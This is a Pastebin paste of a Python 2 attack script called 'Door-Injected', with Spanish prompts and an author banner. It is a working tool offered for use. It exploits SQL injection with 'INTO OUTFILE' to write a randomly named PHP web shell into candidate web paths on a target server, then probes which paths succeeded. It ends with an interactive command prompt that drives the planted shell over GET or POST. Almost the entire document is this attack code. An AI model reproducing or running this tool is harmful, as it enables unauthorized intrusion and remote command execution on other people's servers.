Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/env python
- # Door-Injected
- # Developed by [Q]3rV[0]
- import httplib, sys, os, time, urllib2, urllib, random
- banner="""
- ________ .___ __ __ .___
- \______ \ ____ ___________ | | ____ |__| ____ _____/ |_ ____ __| _/
- | | \ / _ \ / _ \_ __ \ ______ | |/ \ | |/ __ \_/ ___\ __\/ __ \ / __ |
- | ` ( <_> | <_> ) | \/ /_____/ | | | \ | \ ___/\ \___| | \ ___// /_/ |
- /_______ /\____/ \____/|__| |___|___| /\__| |\___ >\___ >__| \___ >____ |
- \/ \/\______| \/ \/ \/ \/
- - Door-Injected V1.0 Beta
- - Autor:[Q]3rV[0]
- - Mail:a.denegado[0x40]gmail[0x2e]com
- - Blog:http://underterminal.nixiweb.com
- - Saludos: Underc0de TEAM """
- if sys.platform=="linux" or sys.platform=="linux2":
- os.system('clear')
- else:
- os.system('cls')
- if len(sys.argv)!=3:
- print banner
- print "\n[*] Modo de uso: "+sys.argv[0]+" <host> <fichero>"
- sys.exit(1)
- def connect(host):
- return httplib.HTTPConnection(host)
- def inyect(host, name):
- fichero=open(sys.argv[2], "r")
- for ruta in fichero:
- ruta=ruta.replace("\n", "")
- connect(host).request("GET", "/"+path+"%20"+vector+"%20into%20outfile%20%27"+directorio+ruta+name+"%27--")
- def buscar(host, name):
- fichero=open(sys.argv[2], "r")
- for ruta in fichero:
- ruta=ruta.replace("\n", "")
- search=connect(host)
- search.request("GET", ruta+name)
- respuesta=search.getresponse()
- if respuesta.status==200:
- print "\n[*] Door-Injected in ------> http://"+host+ruta+name
- else:
- print "\n[X] "+ruta+" ------> Imposible escribir!"
- def command(shell):
- agent={"User-Agent": "Door-Injected"}
- metodo=raw_input("\n[*] Metodo [get/post]:")
- parametro=raw_input("\n[*] Ingrese el parametro:")
- if metodo=="get":
- while 1:
- command=raw_input("\n[*] Door@Injected-$ ")
- data=urllib.urlencode({parametro: command})
- cabeceras=urllib2.Request(shell+"?"+data, headers=agent)
- print urllib2.urlopen(cabeceras).read()
- elif metodo=="post":
- while 1:
- command=raw_input("\n[*] Door@Injected-$ ")
- cabeceras=urllib2.Request(shell, data, headers=agent)
- print urllib2.urlopen(cabeceras).read()
- else:
- print "[ABORT]"
- sys.exit(1)
- try:
- print banner
- target=sys.argv[1]
- path=target.replace("http://", "").split('/',1)[1]
- host=target.replace("http://", "").split('/')[0]
- directorio=raw_input("\n[*] Path Web: ")
- vector=raw_input("\n[*] /"+path+" ")
- vector=vector.replace(" ", "%20")
- name="DoorI"+str(random.randint(1,1000))+".php"
- print "\n[*] Inyectando en paths..."
- time.sleep(2)
- inyect(host, name)
- print "\n[*] Comprobando shell dump..."
- time.sleep(2)
- print "\n+-------------------------------------------------------------------------------------+"
- buscar(host, name)
- print "\n+-------------------------------------------------------------------------------------+"
- opcion=raw_input("\n[*] Desea ejecutar la shell ahora? [y/n]:")
- if opcion=="y":
- shell=raw_input("\n[*] Ingrese la ruta de la shell:")
- command(shell)
- elif opcion=="n":
- sys.exit(1)
- else:
- print "[ABORT]"
- sys.exit(1)
- except(KeyboardInterrupt,SystemExit):
- pass
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement